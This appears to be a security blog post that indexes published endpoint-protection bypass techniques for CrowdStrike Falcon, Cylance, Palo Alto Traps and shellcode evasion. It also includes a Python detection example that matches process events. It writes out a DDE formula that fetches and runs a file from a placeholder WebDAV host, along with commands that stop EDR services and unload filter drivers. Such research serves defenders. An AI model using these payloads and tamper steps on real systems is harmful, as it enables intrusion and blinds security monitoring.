Endpoint Protection, Detection and Response Bypass Techniques Index
I’ve recently seen a bunch of articles and research on endpoint protection and endpoint detection and response bypass techniques, so I decided to spend my research time documenting these techniques and summarizing how each was done. As far as I know there is no categorization of these techniques, so I will simply categorize them by product.
Before we begin, I would like to point to another great piece of research from @Hexacorn: a review of current EDR solutions on the market. This spreadsheet summarizes EDR features and capabilities, which is useful to utilize as targets to evade and bypass.
tr4cefl0w posted on the 0x00sec forum a technique to completely bypass Falcon's detection capability. The technique includes the following steps:
- He achieved code execution via Dynamic Data Exchange (DDE) in Excel, even though Microsoft had already patched and disabled the feature in December 2017. The formula used to leverage this attack is simple.
- He utilized a WebDAV server to drop a dropper, which is nc.exe. Apache2 with the mod_webdav module enabled is used in this step. The embedded formula must be changed to something like
=cmd|'/c cmd.exe /c "copy \\x.x.x.x\webdav\run.txt c:\users\public\run.exe" && cmd.exe /c "c:\users\public\run.exe"'!_xlbgnm.A1
- Unbelievably, it just worked when he simulated the victim by opening the attachment from the email and allowing the embedded content to execute.
Komodo Research describes three ways to bypass CrowdStrike Falcon:
- With LOCAL SYSTEM, they can simply disable the user-mode service CSFalconService with the net command, which prevents remote remediation from the console.
- They have a theory of not leaving behind things CrowdStrike will detect. To put this theory into practice, they create a reverse dynamic port forwarding tunnel on the compromised internal machine. Thus, they can use the compromised machine to access the internal network without alerts from CrowdStrike Falcon.
- They simply installed QEMU on the compromised internal machine for internal discovery and lateral movement.
MDSec covers many interesting points for Cylance:
- The main feature focuses on blocking malicious scripts such as Windows Scripting, PowerShell and Office macros, but does not cover Excel 4.0 macros, a feature that is not as well known as VBA macros. More on weaponizing Excel 4.0 macros.
- For the Memory Protection feature, Cylance injects CyMemDef64.dll into a process. When a malicious process executes, the hooks placed by these DLLs are used to detect execution of a suspicious function. Based on this, MDSec created a function to unhook Cylance's DLL via its DLL exports.
- Cylance also offers an Application Control feature to prevent execution of risky applications such as PowerShell. Cylance uses the same technique described under Memory Protection to enforce these policies. MDSec found that inside CyMemDef64.dll there is a function which compares the executable's name with something like PowerShell.exe. These DLLs also check for the existence of a reference to powershell.pdb in the PE debug directory. If both conditions are true, CyMemDefPS64.dll will be loaded to send a warning message. Thus, MDSec spawned a PowerShell process with the CREATE_SUSPENDED flag and modified the PDB reference before resuming execution, bypassing the Application Control feature.
- MDSec also found a way to bypass VBA execution protection. By analyzing Cylance, MDSec discovered that Cylance adds hooks to the VBA runtime, for example VBE7.dll, which contains functions such as Shell and CreateObject. However, Cylance did nothing about the exposed COM objects. So MDSec simply enabled the Windows Script Host Object Model reference in the VBA project and used the WshShell object to bypass the hooks.
- The Isolation feature of Cylance OPTICS stores an unlock key under HKEY_LOCAL_MACHINE\SOFTWARE\Cylance\Optics\PdbP, which can be simply decrypted using the DPAPI master key available in the Cylance OPTICS assemblies. The Isolation feature can also be bypassed by executing unlock-net without providing the key from LOCAL SYSTEM.
Hoang Bui pointed out hooking and bypass techniques on Palo Alto Traps.
@c0d3xpl0it at Bits of Security wrote a blog post presenting an idea to bypass Traps. The technique utilizes the built-in tool FLTMC.exe, which manages filter drivers, to unload Traps' file monitoring filter driver. The technique requires administrator privileges to issue the commands.
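Several of the techniques above leave the same kind of trace in process-creation telemetry: a filter driver unloaded with fltmc.exe, the EDR user-mode service stopped with net, and an Office process spawning a shell as the Excel DDE formula does. The following added example (not code from any of the researchers or products above) runs three such rules over a constructed set of events; the filter driver name and the event records are made up, and CSFalconService is the only service name taken from the page.

```python
# Constructed sample process-creation events as (parent image, child image,
# command line). These are invented for the example, not product telemetry.
SAMPLE_EVENTS = [
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ("cmd.exe", "fltmc.exe", "fltmc.exe unload EDR_FILTER_PLACEHOLDER"),
    ("cmd.exe", "net.exe", "net stop CSFalconService"),
    ("EXCEL.EXE", "cmd.exe", r'cmd.exe /c "copy \\x.x.x.x\webdav\run.txt c:\users\public\run.exe"'),
    ("explorer.exe", "fltmc.exe", "fltmc.exe filters"),
    ("cmd.exe", "net.exe", "net start Spooler"),
]

# EDR services worth watching for "net stop"; extend with your own estate's names.
EDR_SERVICES = {"csfalconservice"}
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def classify(parent, image, cmdline):
    """Return the name of the first detection rule that matches, or None."""
    parent_l, image_l = parent.lower(), image.lower()
    tokens = cmdline.lower().split()
    # Rule 1: fltmc.exe unloading a minifilter (the FLTMC.exe Traps bypass).
    if image_l == "fltmc.exe" and "unload" in tokens:
        return "edr_filter_unload"
    # Rule 2: net/net1 stopping an EDR service (the CSFalconService case).
    if image_l in {"net.exe", "net1.exe"} and len(tokens) >= 3 \
            and tokens[1] == "stop" and tokens[2] in EDR_SERVICES:
        return "edr_service_stop"
    # Rule 3: an Office application spawning a shell, as the DDE formula does.
    if parent_l in OFFICE_PARENTS and image_l in SHELLS:
        return "office_spawned_shell"
    return None


def detect(events):
    """Run every event through classify() and return the (rule, cmdline) hits."""
    hits = []
    for parent, image, cmdline in events:
        rule = classify(parent, image, cmdline)
        if rule:
            hits.append((rule, cmdline))
    return hits


if __name__ == "__main__":
    for rule, cmdline in detect(SAMPLE_EVENTS):
        print(f"{rule:24s} {cmdline}")
```

Rules 1 and 2 fire on legitimate administration as well, so in practice they are scoped by parent process and account rather than used as stand-alone alerts.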
Mantvydas Baranauskas at Red Teaming Experiments presented an idea of modifying shellcode in order to evade detection, which I personally think is similar but not identical to the Ghost Writing technique I learnt on SEC504. The technique is accomplished by changing parts of the shellcode to avoid some kinds of pattern detection, and flipping them back before writing the shellcode to the allocated memory.